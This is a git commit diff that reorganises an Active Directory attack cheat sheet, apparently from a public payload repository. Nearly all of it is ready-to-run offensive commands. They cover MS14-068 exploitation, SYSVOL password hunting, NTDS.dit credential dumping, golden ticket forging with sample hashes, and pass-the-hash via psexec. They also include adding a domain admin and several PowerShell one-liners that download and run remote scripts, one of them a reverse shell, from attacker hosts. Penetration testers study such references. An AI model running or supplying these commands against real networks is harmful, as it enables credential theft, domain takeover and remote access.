AD refactoring part1

This commit is contained in:
Swissky 2018-05-05 17:32:19 +02:00
parent 2dcffadd46
commit 6869c399d5
3 changed files with 157 additions and 120 deletions

1
.gitignore vendored
View File

@ -1 +1,2 @@
.vscode
Low_hanging_fruits.md Low_hanging_fruits.md

View File

@ -1,125 +1,156 @@
# Active Directory Attacks # Active Directory Attacks
## Most common paths to AD compromise
* MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)
```bash
Exploit Python: https://www.exploit-db.com/exploits/35474/
Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068
Metasploit: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
git clone https://github.com/bidord/pykek
python ./ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> -p <clearPassword>
python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-2222329127-1110 -d adsdc02.lab.adsecurity.org
mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache"
```
* MS17-010 (Eternal Blue - Local Admin)
```c
nmap -Pn -p445openmax-hostgroup 3script smb-vuln-ms17010 <ip_netblock>
```
* Unconstrained Delegation (incl. pass-the-ticket)
* OverPass-the-Hash (Making the most of NTLM password hashes)
* GPO - Pivoting with Local Admin & Passwords in SYSVOL
```c
findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
or
Metasploit: scanner/smb/smb_enumshares
Metasploit: windows/gather/enumshares
Metasploit: windows/gather/credentials/gpp
/!\ GPO Priorization : Organization Unit > Domain > Site > Local
List all GPO for a domain :
Get-GPO -domaine DOMAIN.COM -all
Get-GPOReport -all -reporttype xml --all
or
Powersploit:
Get-NetGPO
Get-NetGPOGroup
```
* Dangerous Built-in Groups Usage
* Dumping AD Domain Credentials (%SystemRoot%\NTDS\Ntds.dit)
```c
C:\>ntdsutil
ntdsutil: activate instance ntds
ntdsutil: ifm
ifm: create full c:\pentest
ifm: quit
ntdsutil: quit
or
vssadmin create shadow /for=C :
Copy Shadow_Copy_Volume_Name\windows\ntds\ntds.dit c:\ntds.dit
then you need to use secretsdump to extract the hashes
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
or
Metasploit : windows/gather/credentials/domain_hashdump
or
PowerSploit : Invoke-NinjaCopy --path c:\windows\NTDS\ntds.dit --verbose --localdestination c:\ntds.dit
```
* Golden Tickets
Mimikatz version
```c
Get info - Mimikatz
lsadump::dcsync /user:krbtgt
lsadump::lsa /inject /name:krbtgt
Forge a Golden ticket - Mimikatz
kerberos::golden /user:evil /domain:pentestlab.local /sid:S-1-5-21-3737340914-2019594255-2413685307 /krbtgt:d125e4f69c851529045ec95ca80fa37e /ticket:evil.tck /ptt
kerberos::tgt
```
Meterpreter version
```c
Get info - Meterpreter(kiwi)
dcsync_ntlm krbtgt
dcsync krbtgt
Forge a Golden ticket - Meterpreter
load kiwi
golden_ticket_create -d <domainname> -k <nthashof krbtgt> -s <SID without le RID> -u <user_for_the_ticket> -t <location_to_store_tck>
golden_ticket_create -d pentestlab.local -u pentestlabuser -s S-1-5-21-3737340914-2019594255-2413685307 -k d125e4f69c851529045ec95ca80fa37e -t /root/Downloads/pentestlabuser.tck
kerberos_ticket_purge
kerberos_ticket_use /root/Downloads/pentestlabuser.tck
kerberos_ticket_list
```
* Kerberoast
```c
https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/
https://room362.com/post/2016/kerberoast-pt1/
```
* Silver Tickets
* Trust Tickets
## Tools ## Tools
* [Impacket](https://github.com/CoreSecurity/impacket)
* [Responder](https://github.com/SpiderLabs/Responder) * [Impacket](https://github.com/CoreSecurity/impacket)
* [Mimikatz](https://github.com/gentilkiwi/mimikatz) * [Responder](https://github.com/SpiderLabs/Responder)
* [Ranger](https://github.com/funkandwagnalls/ranger) * [Mimikatz](https://github.com/gentilkiwi/mimikatz)
* [BloodHound](https://github.com/BloodHoundAD/BloodHound) * [Ranger](https://github.com/funkandwagnalls/ranger)
* [AdExplorer](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer) * [BloodHound](https://github.com/BloodHoundAD/BloodHound)
* [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec) * [AdExplorer](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer)
* [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon) * [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec)
``` * [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon)
powershell.exe -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks” ```powershell
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');" powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks"
``` powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');"
```
## Most common paths to AD compromise
### MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)
```bash
Exploit Python: https://www.exploit-db.com/exploits/35474/
Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068
Metasploit: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
git clone https://github.com/bidord/pykek
python ./ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> -p <clearPassword>
python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-2222329127-1110 -d adsdc02.lab.adsecurity.org
mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache"
```
### GPO - Pivoting with Local Admin & Passwords in SYSVOL
:triangular_flag_on_post: GPO Priorization : Organization Unit > Domain > Site > Local
Find password in SYSVOL
```powershell
findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
```
Metasploit modules to enumerate shares and credentials
```c
scanner/smb/smb_enumshares
windows/gather/enumshares
windows/gather/credentials/gpp
```
List all GPO for a domain
```powershell
Get-GPO -domaine DOMAIN.COM -all
Get-GPOReport -all -reporttype xml --all
Powersploit:
Get-NetGPO
Get-NetGPOGroup
```
### Dumping AD Domain Credentials (%SystemRoot%\NTDS\Ntds.dit)
```c
C:\>ntdsutil
ntdsutil: activate instance ntds
ntdsutil: ifm
ifm: create full c:\pentest
ifm: quit
ntdsutil: quit
or
vssadmin create shadow /for=C :
Copy Shadow_Copy_Volume_Name\windows\ntds\ntds.dit c:\ntds.dit
```
then you need to use secretsdump to extract the hashes
```c
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
```
Metasploit module
```c
windows/gather/credentials/domain_hashdump
```
PowerSploit module
```
Invoke-NinjaCopy --path c:\windows\NTDS\ntds.dit --verbose --localdestination c:\ntds.dit
```
### Golden Tickets
Mimikatz version
```powershell
Get info - Mimikatz
lsadump::dcsync /user:krbtgt
lsadump::lsa /inject /name:krbtgt
Forge a Golden ticket - Mimikatz
kerberos::golden /user:evil /domain:pentestlab.local /sid:S-1-5-21-3737340914-2019594255-2413685307 /krbtgt:d125e4f69c851529045ec95ca80fa37e /ticket:evil.tck /ptt
kerberos::tgt
```
Meterpreter version
```c
Get info - Meterpreter(kiwi)
dcsync_ntlm krbtgt
dcsync krbtgt
Forge a Golden ticket - Meterpreter
load kiwi
golden_ticket_create -d <domainname> -k <nthashof krbtgt> -s <SID without le RID> -u <user_for_the_ticket> -t <location_to_store_tck>
golden_ticket_create -d pentestlab.local -u pentestlabuser -s S-1-5-21-3737340914-2019594255-2413685307 -k d125e4f69c851529045ec95ca80fa37e -t /root/Downloads/pentestlabuser.tck
kerberos_ticket_purge
kerberos_ticket_use /root/Downloads/pentestlabuser.tck
kerberos_ticket_list
```
### Silver Tickets
### Trust Tickets
### Kerberoast
```c
https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/
https://room362.com/post/2016/kerberoast-pt1/
```
### Pass-the-Hash
Note: the password can be replaced by a hash to execute a `pass the hash` attack.
```c
use exploit/windows/smb/psexec
set RHOST 10.2.0.3
set SMBUser jarrieta
set SMBPass nastyCutt3r
set PAYLOAD windows/meterpreter/bind_tcp
run
shell
```
### OverPass-the-Hash (pass the key)
### Dangerous Built-in Groups Usage
AdminSDHolder
```powershell
Get-ADUser -LDAPFilter "(objectcategory=person)(samaccountname=*)(admincount=1)"
Get-ADGroup -LDAPFilter "(objectcategory=group) (admincount=1)"
or
([adsisearcher]"(AdminCount=1)").findall()
```
## Privilege Escalation ## Privilege Escalation
### PrivEsc - Token Impersonation (RottenPotato) ### PrivEsc Local Admin - Token Impersonation (RottenPotato)
Binary available at : https://github.com/foxglovesec/RottenPotato Binary available at : https://github.com/foxglovesec/RottenPotato
Binary available at : https://github.com/breenmachine/RottenPotatoNG Binary available at : https://github.com/breenmachine/RottenPotatoNG
```c ```c
@ -132,14 +163,14 @@ execute -Hc -f ./rot.exe
impersonate\_token "NT AUTHORITY\SYSTEM" impersonate\_token "NT AUTHORITY\SYSTEM"
``` ```
``` ```powershell
Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser" Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"
Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM" Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"
Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};" Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};"
``` ```
### PrivEsc - MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) ### PrivEsc Local Admin - MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)
``` ```
Powershell: Powershell:
https://www.exploit-db.com/exploits/39719/ https://www.exploit-db.com/exploits/39719/
@ -151,8 +182,13 @@ Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc
``` ```
## Local Admin to Domain Admin ### PrivEsc Local Admin - MS17-010 (Eternal Blue)
```c
nmap -Pn -p445openmax-hostgroup 3script smb-vuln-ms17010 <ip_netblock>
``` ```
### From Local Admin to Domain Admin
```powershell
net user hacker2 hacker123 /add /Domain net user hacker2 hacker123 /add /Domain
net group "Domain Admins" hacker2 /add /domain net group "Domain Admins" hacker2 /add /domain
``` ```

View File

@ -3,7 +3,7 @@ A list of useful payloads and bypasses for Web Application Security.
Feel free to improve with your payloads and techniques ! Feel free to improve with your payloads and techniques !
I <3 pull requests :) I <3 pull requests :)
All sections contain: Every section contains:
- README.md - vulnerability description and how to exploit it - README.md - vulnerability description and how to exploit it
- Intruders - a set of files to give to Burp Intruder - Intruders - a set of files to give to Burp Intruder
- Some exploits - Some exploits